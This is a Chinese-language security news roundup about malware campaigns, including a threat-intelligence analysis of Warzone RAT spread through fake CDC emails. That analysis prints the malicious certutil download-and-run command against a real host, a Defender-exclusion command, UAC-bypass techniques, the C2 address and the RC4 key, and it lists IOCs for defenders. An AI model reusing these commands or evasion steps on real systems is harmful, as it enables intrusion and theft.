标签: 恶意软件

新 COVID-9 恶意程序会删除计算机数据

安全研究人员发现了至少五种 COVID-19 主题的恶意程序,其中四种设计是去破坏被感染的计算机,删除文件或覆写主引导记录,还有一种可能只是测试或恶作剧。第一种能覆写主引导的新冠恶意程序是 MalwareHunterTeam 发现的,名字就叫 COVID-19.exe;第二种则伪装成勒索软件,但其主要功能是窃取密码。 MalwareHunterTeam 还报告了数据删除的新冠主题恶意程序,其中一种使用中文文件名,可能设计针对中文用户,还不清楚这种恶意程序是否广泛传播或只是测试。   (稿源:solidot,封面源自网络。)

警惕假冒美国 CDC 发送新冠疫情的邮件投递商业木马 Warzone RAT

感谢腾讯御见威胁情报中心来稿! 原文:https://mp.weixin.qq.com/s/TRY4-1aUf5gTLHOWQ7PWuQ   一、背景 腾讯安全威胁情报中心检测到有黑客利用新冠肺炎(Covid-19)疫情相关的诱饵文档攻击外贸行业。黑客伪造美国疾病控制和预防中心(CDC)作为发件人,投递附带Office公式编辑器漏洞的文档至目标邮箱,收件人在存在Office公式编辑器漏洞(CVE-2017-11882)的电脑上打开文档,就可能触发漏洞下载商业远控木马Warzone RAT。 Warzone RAT是在网络上公开销售的商业木马软件,具有密码采集、远程执行任意程序、键盘记录、远程桌面控制、上传下载文件、远程打开摄像头等多种远程控制功能,并且还可以在包括Win10在内的Windows系统上进行特权提升。 根据腾讯安全威胁情报中心数据,该病毒从3月23日开始传播,目前已有广东、上海、湖北等地的外贸企业受到黑客钓鱼邮件的攻击。腾讯安全专家提醒企业用户小心处理不明邮件,建议网管使用腾讯T-Sec高级威胁检测系统检测黑客攻击,客户端可采用腾讯T-Sec终端安全管理系统或腾讯电脑管家拦截病毒。 二、样本分析 攻击邮件伪装成美国疾病控制和预防中心(cdc.gov)发送关于Covid-19的重要更新通知,将漏洞利用的DOC Word文件命名为COVID-19 – nCoV – Special Update.doc,引导收件人打开查看。 此时如果用户在没有安全防护软件,且使用没有修复CVE-2017-11882漏洞的Office打开此文档,就会触发漏洞中的恶意代码,然后恶意代码从C2服务器下载并运行木马病毒。文档下载木马的命令为: CmD /C cErTuTiL -uRlCAchE -sPlIT -f http[:]//getegroup.com/file.exe %TMP%\\1.exe&start %TMP%\\1.exe File.exe外壳程序采样C#编写,代码经过高度混淆,运行时经过两次解密在内存中Invoke执行最终的PE文件,该PE通过分析可确认为商业远控木马Warzone RAT。 Warzone RAT最早2018年在warzone[.]io上公开出现,目前在warzone[.]pw上提供销售。Warzone RAT商业木马软件具有以下功能: 可通过VNC进行远程桌面控制 可通过RDPWrap进行隐藏的远程桌面控制 特权升级(包括最新的Win10系统) 远程开启摄像头 盗取浏览器密码(Chrome,Firefox,IE,Edge,Outlook,Thunderbird,Foxmail) 下载、执行任意文件 离线键盘记录器或实时键盘记录器 远程shell 文件管理 进程管理 反向连接 三、窃密 Warzone RAT木马窃密功能包含窃取各类浏览器登陆使用的账号密码以及邮件客户端保存的账号信息。 获取保存在Chrome中的账号密码信息。 获取保存在IE浏览器中的账号密码信息。 获取OutLook邮箱中的账号密码信息。 获取Thunderbird邮箱中的账号密码信息。 获取Firefo浏览器中的账号密码信息。 四、特权提升 如果Warzone RAT以提升的特权运行,则会使用以下PowerShell命令将指定路径添加到Windows Defender的排除项中: powershell Add-MpPreference -ExclusionPath 对于Windows 10以下的版本,使用存储在其资源WM_DSP中的模块进行UAC绕过。 该模块代码最终使用pkgmgr.exe以更高的特权加载恶意程序。 对于Windows 10则利用sdclt.exe 的权限自动提升功能,该功能在Windows备份和还原机制的上下文中使用。 五、远程控制 解密出C2地址:phantom101.duckdns.org:5200,与该地址建立连接成为受控机,使电脑完全被黑客控制。 与服务器进行TCP通信,传输数据使用RC4加密算法加密,密钥为”warzone160”。 与控制端通信的部分协议命令和含义如下: C&C 操作 2 枚举进程信息 4 枚举磁盘信息 6 枚举文件 8 读取文件 10 删除文件 12 杀死进程 14 远程Shell 20 开启摄像头 26 卸载木马 28 上传文件 32 从浏览器获取密码 34 下载并执行程序 36 键盘记录(在线) 38 键盘记录(离线) 40 RDP 42 建立反向连接 44 反向连接断开 48 Socket设置 58 执行文件 60 读取日志 六、安全建议 1、建议不要打开不明来源的邮件附件,对于邮件附件中的文件要谨慎运行,如发现有脚本或其他可执行文件可先使用杀毒软件进行扫描; 2、安装CVE-2017-11882漏洞补丁:https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11882 3、 禁用公式编辑器组件: a) 可以通过运行如下命令禁用Office编辑器: reg add"HKLMSOFTWAREMicrosoftOfficeCommonCOMCompatibility{0002CE02-0000-0000-C000-0000 b) 对于 x64 OS 中的32位Microsoft Office 软件包, 运行以下命令: reg add"HKLMSOFTWAREWow6432NodeMicrosoftOfficeCommonCOM Compatibility{0002CE02-0000-0000-C000-000000000046}"/v "Compatibility Flags" /t REG_DWORD /d 0x400 4、企业网管,可以设置拦截以下邮件发件人的邮件。 de.iana@aol.com shenzhen@faithfulinc.com 5、推荐企业用户部署腾讯T-Sec高级威胁检测系统(腾讯御界)对黑客攻击行为进行检测。 腾讯T-Sec高级威胁检测系统,是基于腾讯安全能力、依托腾讯在云和端的海量数据,研发出的独特威胁情报和恶意检测模型系统,该系统可及时有效检测黑客对企业网络的各种入侵渗透攻击风险。参考链接:https://cloud.tencent.com/product/nta 6、企业终端系统保护 终端电脑可部署腾讯T-Sec终端安全管理系统(御点)拦截病毒木马攻击,更多信息参考链接:https://s.tencent.com/product/yd/index.html。 IOCs C&C phantom101.duckdns.org:5200 MD5 76387fb419cebcfb4b2b42e6dc544e8b 55b75cf1235c3345a62f79d8c824c571 030e95d974c5026499ca159055b2dfa6 URL http://getegroup.com/file.exe 参考链接 https://www.freebuf.com/column/156458.html https://research.checkpoint.com/2020/warzone-behind-the-enemy-lines/

卡巴斯基曝光两款 Android 恶意软件 可控制用户 Facebook 账户

安全大厂卡巴斯基刚刚公布了两款危害 Android 设备的新型恶意软件,警告其可能控制用户的 Facebook 等社交媒体账户。受感染的机器会向攻击者敞开用户社交帐户的访问权限,并被广泛应用于垃圾邮件和网络钓鱼等活动。更糟糕的是,两款恶意软件会协同工作,并逐步对用户设备展开破坏。 第一款恶意软件会尝试在受感染的 Android 设备上取得 root 权限,使得网络犯罪分子能够提取 Facebook 的 cookie,并将之上传到受控服务器。 卡巴斯基指出,通常情况下,仅拥有账号 ID 是不足以控制用户账户的。网站已经采取了一些安全措施,以阻止可疑的登陆尝试。 第二款 Android 木马可在受感染的设备上设置代理服务器,使得攻击者能够绕过安全措施,从而实现对设备的几乎完全控制,以染指受害者的社交媒体账户。 庆幸的是,只有少数人受到 Cookiethief 的威胁。但估计过不了多久,类似的攻击方法会变得越来越普遍。 卡巴斯基恶意软件分析师 Igor Golovin 表示:通过结合这两种方法,攻击者可在不引起受害者明显怀疑的情况下达成对 cookie 信息的窃取和账户的控制。 尽管这是一个相对较新的威胁,迄今为止的受害者只有 1000 人左右,但这一数字仍可能进一步增长,尤其是网站很难检测到行为的异常。 尽管我们在日常的网页浏览过程中不怎么关注,但 cookie 信息其实无处不在。作为处理个人信息的一种方法,其旨在收集线上的有关数据。 最后,卡巴斯基建议用户应养成良好的习惯,始终通过受信任的来源下载应用、阻止第三方 cookie 访问并定期清除,以充分抵御此类攻击。   (稿源:cnBeta,封面源自网络。)

研究发现重新打包的恶意软件被用来攻击其他黑客

Cybereason 的 Amit Serper 在一轮新的恶意软件活动中发现,通过重新打包被感染的恶意软件,黑客本身也成为了其他黑客的攻击目标。此前多年,黑客普遍在利用现有的工具来实施网络犯罪行动,比如从数据库中窃取数据、通过破解 / 注册码生成器来解锁试用软件的完整版等。 然而功能强大的远程工具本身,也成为了某些别有用心者的目标。通过注入木马,制作者可在工具打开后获得对目标计算机的完全访问权限。 Amit Serper 表示,攻击者倾向于在黑客论坛上发布经其重新打包的工具来‘诱骗’其他黑客,甚至为已经遭到恶意软件破坏的系统进一步打开后门。 如果黑客利用这些木马工具对某企业发动了网络攻击(包括从事安全研究工作的白帽),那重新打包攻击工具的那个人,也能够访问到受害者的敏感数据。 据悉,这些迄今未知的攻击者,正在使用功能强大的 njRat 木马来注入代码并重新打包黑客工具,攻击者可完全访问目标桌面、文件、木马、甚至网络摄像头和麦克风。 该木马至少可追溯到 2013 年,当时它经常被用于对付中东地区的目标,多通过网络钓鱼电子邮件和受感染的闪存驱动器来传播。 然而最近,黑客已将恶意软件注入到休眠或不安全的网站中,以逃避检测。以最近的攻击为例,可知幕后黑手正在使用相同的黑客技术来托管 njRat 。 Amit Serper 指出,攻击者破坏了不知谁拥有的几个网站,以托管数百个 njRat 恶意软件样本、以及攻击者用于控制的基础结构。 更糟的是,这种将 njRat 木马注入黑客工具的过程几乎每天都在发生,意味着它可能是在无人直接干预的情况下自动完成的。 至于幕后主使者和发起攻击的确切原因,目前暂不得而知。   (稿源:cnBeta,封面源自网络。)

首款破解 2FA 的 Android 恶意程序曝光:可窃取银行帐号

上月,总部位于阿姆斯特丹的网络安全公司ThreatFabric发现了名为Cerberus的恶意程序。它是有史以来首款能够成功窃取Google Authenticator应用程序生成的2FA(两因素身份验证)代码功能的Android恶意软件。该软件目前正在开发过程中,目前没有证据表明已用于实际攻击。 研究人员表示,该恶意程序混合了银行木马和远程访问木马(RAT)特性。一旦Android用户被感染,黑客便会使用该恶意软件的银行木马功能来窃取移动银行应用程序的帐号凭据。 ThreatFabric的报告指出,远程访问特洛伊木马(Cerberus)是在6月底首次发现的,它取代了Anubis木马,并逐渐成为一种主要的恶意软件即服务产品。 报告指出,Cerberus在2020年1月中旬进行了更新,新版本引入了从Google Authenticator窃取2FA令牌以及设备屏幕锁定PIN码和滑动方式的功能。 即使用户账户受到2FA(Google Authenticator生成)保护,恶意程序Cerberus可以通过RAT功能手动连接到用户设备。然后,黑客将打开Authenticator应用程序,生成一次性密码,截取这些代码的屏幕截图,然后访问该用户的帐户。 安全团队表示:“启用窃取设备的屏幕锁定凭据(PIN和锁定模式)的功能由一个简单的覆盖层提供支持,该覆盖层将要求受害者解锁设备。从RAT的实现中,我们可以得出结论,建立此屏幕锁定凭据盗窃是为了使参与者能够远程解锁设备,以便在受害者不使用设备时进行欺诈。这再次显示了罪犯创造成功所需的正确工具的创造力。” 在本周发表的研究中,来自Nightwatch Cybersecurity的研究人员深入研究了导致这种攻击的根本原因,即Authenticator应用程序首先允许对其内容进行屏幕截图。 Android操作系统允许应用程序阻止其他应用程序截屏其内容,从而保护其用户。这是通过在应用程序的配置中添加“ FLAG_SECURE”选项来完成的。Google并未将此标记添加到Authenticator的应用中,尽管该应用通常处理一些非常敏感的内容。 Nightwatch研究人员表示,谷歌早在2014年的10月就收到了相关的问题报告,当时有用户在GitHub上注意到这个错误配置。2017年,Nightwatch在2017年的时候又向谷歌的安全团队报告了相同的问题,此外还发现微软的Authenticator同样存在能够截图问题。   (稿源:cnBeta,封面源自网络。)

黑客利用疫情传播 Emotet 恶意程序 日本地区最猖獗

网络诈骗者往往会抓住时下热点,欺骗用户点击链接或者下载含有恶意代码的软件。例如在过去几个月中,就有诈骗者利用澳大利亚山火进行虚假众筹,以及出售假冒的科比·布莱恩特纪念品等等。时下最热门的话题莫过于新型冠状病毒,因此诈骗者利用该新闻进行传播恶意程序就没有奇怪的了。 这些恶意行为最早是由CheckPoint发现的,这些网络诈骗者发送了当地或者全球世界卫生组织的官方文件。如果用户打开这些看上去合法的文件,那么计算机就会被感染。 根据初步调查这种恶意行为在日本最为猖獗,诈骗者伪装日本残疾人福利服务提供商分发了携带有Emotet(连续4个月位排行第4的恶意软件)的电子邮件附件。这些电子邮件似乎正在报告感染在日本几个城市中蔓延的位置,这鼓励受害者打开文档,如果打开该文档,则尝试在其计算机上下载Emotet。 也有报道称,诈骗者正在使用带有恶意链接的网络钓鱼电子邮件,乍一看似乎将用户定向到疾病控制与预防中心(CDC)的官方网站,而实际上他们被引导到鼓励用户访问的页面他们输入他们的电子邮件帐号密码。   (稿源:cnBeta,封面源自网络。)  

美政府披露所谓朝鲜黑客使用的七款恶意软件

上周五,美国五角大楼、联邦调查局和国土安全部,联合发布了有关朝鲜发起的黑客攻击事件的技术细节。其中谈到了七种恶意软件,涉及网络钓鱼和远程访问,以及所谓的非法活动、窃取资金和逃避制裁。在 @CNMF_VirusAlert 发布的推特帖子中,还附上了有关详情的链接。 链接到 VirusTotal 的帖子,公布了有关散列密码、文件名和其它技术详情,可帮助防御者识别其内部网络威胁。 美国土安全部下设网络安全和基础设施安全局(IEA)的咨询顾问称,行动背后有着 Hidden Cobra 的身影,美方怀疑该黑客组织与朝鲜政府有关。 本次曝光的七款恶意软件,有六个都被上传到了 VirusTotal,包括: Bistromath:功能齐全的远程访问木马和植入程序,可执行系统调查、文件上传和下载、处理和命令执行,以及对麦克风、剪贴板和屏幕的监视。 Slickshoes:一种信标植入手段,可加载但不执行,能够辅助 Bistromath 实现诸多功能。 Hotcroissant:一种功能齐全的信标植入手段,可实现上文列出的诸多相同功能。 Artfulpie:可从硬编码的网址执行 DLL 文件的下载,在内存中加载和执行植入程序。 Buttetline:另一种功能完备的植入手段,使用伪造的 HTTPS 方案和经过修改的 RC4 加密密码来保持隐身状态。 Crowdedflounder:一个 Windows 可执行文件,旨在将远程访问木马解压到计算机内存中并执行。 Cyberscoop 指出:上周五的行动,标志着美国网络司令部首次认定了朝方的黑客行动。促成这一点的其中一个原因,是攻击的复杂性已变得越来越高。 包括路透社在内的多家新闻机构,均援引过去年八月的联合国报告,预估朝方黑客针对金融机构和加密货币交易攻击的获利高达 20 亿美元。   (稿源:cnBeta,封面源自网络。)

Android 恶意软件 xHelper 的删除方法

xHelper 是一种 Android 恶意软件,安全厂商 Malwarebytes 于 2019 年 5 月检测到了它的存在。这是一个隐蔽的恶意软件删除程序,即使在用户恢复出厂设置以后,该恶意软件还是会重新感染,从而给全世界的用户带来了持续困扰。 Malwarebytes 的安全研究人员一直在研究该威胁,在近日发布的一篇博客文章中,该团队表示,尽管仍未弄清楚该恶意软件如何自行重新安装,但他们确实已经发现了有关其操作方式的足够信息,以便永久删除它,并防止 xHelper 在恢复出厂设置后重新安装自身。 据 Malwarebytes 小组透露,xHelper 找到了一种使用 Google Play Store 应用内的进程来触发重新安装操作的方法。借助在设备上创建的特殊目录,xHelper 可以将其 Android 应用程序包(Android application package,APK)隐藏在磁盘上。与应用程序不同,即使在恢复出厂设置后,其目录和文件仍保留在 Android 移动设备上。因此,在删除目录和文件之前,设备将继续受到感染。 Malwarebytes 在对恶意软件的分析中解释道,“Google Play 未感染恶意软件。但是,Google Play 中的某些事件触发了重新感染-可能是某些东西正在存储中。此外,有些东西可能还会将 Google Play 用作烟幕,从而将其伪装为恶意软件的安装来源,而实际上它来自其他地方。” 删除 xHelper 的方法 值得注意的是,以下删除步骤依赖用户安装适用于 Android 的 Malwarebytes 应用程序,不过该应用程序可免费使用。 具体删除步骤如下: 从Google PLAY 安装文件管理器,该文件管理器可以搜索文件和目录。 Amelia 使用了 ASTRO 的 File Manager。 暂时禁用 Google PLAY 以停止重新感染。 转到设置 > 应用 > Google Play 商店 按禁用按钮在 Android 的 Malwarebytes 中运行扫描,以删除 xHelper 和其他恶意软件。 手动卸载可能是困难的,但是要在“应用程序”信息中查找的名称是 fireway,xhelper 和“设置”(仅在显示两个设置应用程序的情况下)。打开文件管理器并搜索以 com.mufc 开头的任何内容。 如果找到,记下最后修改日期。 专业提示:在文件管理器中按日期排序 在 ASTRO 的文件管理器中,您可以在视图设置下按日期排序删除以 com.mufc 开头的所有内容。以及具有相同日期的任何内容(除了核心目录,如 Download): 重新启用 Google PLAY 转到设置 > 应用 > Google Play 商店 按启用按钮   (稿源:开源中国,封面源自网络。)

谷歌移除 500 多款恶意扩展

在思科Duo Security团队和安全研究员贾米拉·卡亚(Jamila Kaya)两个多月的深入调查之后,谷歌近日宣布从官方网上商城删除500多个恶意Chrome扩展程序。据悉这些扩展程序都会在用户浏览会话中注入恶意广告(malvertising)。 这些扩展程序注入的恶意代码会在特定条件下激活,并将用户重定向到特定的页面。在某些情况下,重定向地址可能是Macys,DELL或BestBuy等合法网站上的会员链接;而在其他情况下可能是恶意站点,例如恶意软件的下载站点或者网络钓鱼页面。 根据Duo Security团队和Jamila Kaya分享的报告,这些恶意扩展程序上线至少有两年时间了。这些恶意扩展最初是由Kaya发现的,她在例行的威胁扫描期间发现这些恶意扩展通过通用URL模式访问恶意网站。 利用CRXcavator(一种用于分析Chrome扩展程序的服务),Kaya发现了最初的扩展程序集群,它们在几乎相同的代码库上运行,但是使用了各种通用名称,而鲜有关于其真实用途的信息。 Kaya告诉我们:“仅靠我个人,就确定了十几个采用该共享模式的扩展程序。与Duo联络后,我们能够使用CRXcavator的数据库对其进行快速指纹识别,并发现整个网络”。根据Duo的说法,首批扩展程序的安装总数超过了170万名Chrome用户。 Kaya表示随后我们将发现的结果反馈给了谷歌。随后谷歌经过自查发现了更多符合这种模式的扩展程序,随后删除了500多个扩展程序。目前尚不清楚有多少用户安装了500多个恶意扩展,但数量可能超过数百万。   (稿源:cnBeta,封面源自网络。)

僵尸网络 Emotet 能通过相邻 Wi-Fi 网络传播

Emotet 是最具危险性的恶意程序之一,它能窃取银行账号,安装不同类型的其它恶意程序。最近其运营者被发现开始采用新的方法进行传播:通过相邻的 Wi-Fi 网络。它利用名为 wlanAPI 的 API 收集附近无线网络的 SSID、信号强度、加密方法如 WPA,然后使用一个常用用户名密码组合列表尝试登陆。 如果成功登陆,被感染的设备会枚举所有连接到该网络的非隐藏设备,然后使用第二个密码列表去猜测连接设备的凭证。 它还会尝试猜共享资源的管理员密码。如果它成功猜出连接设备的密码,那么它就会加载  Emotet 和其它恶意程序。弱密码用户最好修改密码使用强密码。   (稿源:solidot,封面源自网络。)